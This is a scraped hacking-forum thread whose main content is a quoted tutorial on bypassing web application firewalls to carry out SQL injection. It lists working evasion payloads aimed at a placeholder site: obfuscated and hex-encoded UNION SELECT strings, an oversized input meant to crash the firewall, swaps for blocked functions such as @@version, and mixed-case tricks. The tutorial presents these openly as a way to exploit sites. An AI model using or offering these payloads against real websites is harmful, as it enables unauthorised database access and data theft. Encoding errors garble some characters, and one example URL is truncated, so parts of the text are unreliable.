Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


WAF Bypassing Methods

  • 0 Vote(s) - 0 Average


09-15-2013, 08:52 PM #11
Sizziling Leet Offline Any problem of iphone ipad ipod ask me ! *****
Respected
Posts:469 Threads:53 Joined:Aug 2013 Reputation: 1
Mood: None
Biggrinsmiley Tonguesmiley lol bro nice

[Image: FcZ0mAj9G.gif]


[Image: xlu6ncekv.gif]





Code name : Sizziling Leet Haxor

Contact : [email protected]


Facebook
https://www.facebook.com/david.daniel.90857901 i chnaged my accout so please bros add me there


ReGarD's Worriedsmileyhy:





11-06-2013, 01:58 AM #12
VIRkid Offline MadLeets Vip ******
V.I.P
Posts:62 Threads:9 Joined:Oct 2013 Reputation: 9
Mood: Blessed
thanks for the nice share Smiley1

07-05-2017, 02:09 AM #13
833M0L3 Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2017 Reputation: 0
Mood: None
(08-29-2013, 11:10 PM)KinG_HaXoR(PHC) Wrote:  hi mads ; this is King_Haxor for u
hope u will enjoy My tut
this is On WAF Bypassing , many people not know what is this ?
So lets 1s Know about WAF.

WHAT IS W.A.F


A web application firewall (WAF) is an
appliance, server plugin, or filter that applies a set of rules to an
HTTP conversation. Generally, these rules cover common attacks such as
Cross-site Scripting (XSS) and SQL Injection. By customizing the rules
to your application, many attacks can be identified and blocked. The
effort to perform this customization can be significant and needs to be
maintained as the application is modified.






How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a
command used for SQL Injections (usually the �UNION SELECT� command),
you get an 403 Error (and the website says �Forbidden� or �Not
Acceptable�).


Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4�.

(We get a 403 Error!)





Advanced Methods:

1.Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Quote:Quote:http://www.site.com/index.php?page_id=-15+and+(select
1)=(Select 0xAA[..(add about 1000
"A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4�.



(( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4�.



If you get a 500, you can exploit it using the Buffer Overflow Method! ))




2.Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.


Example:



Quote:Quote:http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4�.

(which means �union select�)




Text to Hex Encoder (Choose the �Hex Encoded for URL� result!):http://www.online-toolz.com/tools/text-hex-convertor.php


3.Use other Variables or Commands instead of the common ones for SQLi:

Apart from the �UNION SELECT� other commands might be blocked.

Common Commands Blocked:

Quote:Quote:COMMAND | WHAT TO USE INSTEAD



@@version | version()

concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU

group_concat() | concat_ws()


4.Misc Exploitable Functions:

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:

Quote:Quote:This firewall below replaces �*� (asterisks) with Whitespaces! What we can do is this:



http://www.site.com/index.php?page_id=-1...t+1,2,3,4�



(If the Firewall removes the �*�, the result will be: 15+union+select�.)
5.Caps and LowerCase

Quote:Quote: -15+(uNioN)+(sElECt)�.



-15+(uNioN+SeleCT)+�



-15+(UnI)(oN)+(SeL)(ecT)+�.



-15+union (select 1,2,3,4�)






Forum Jump:


Users browsing this thread:1 Guest(s)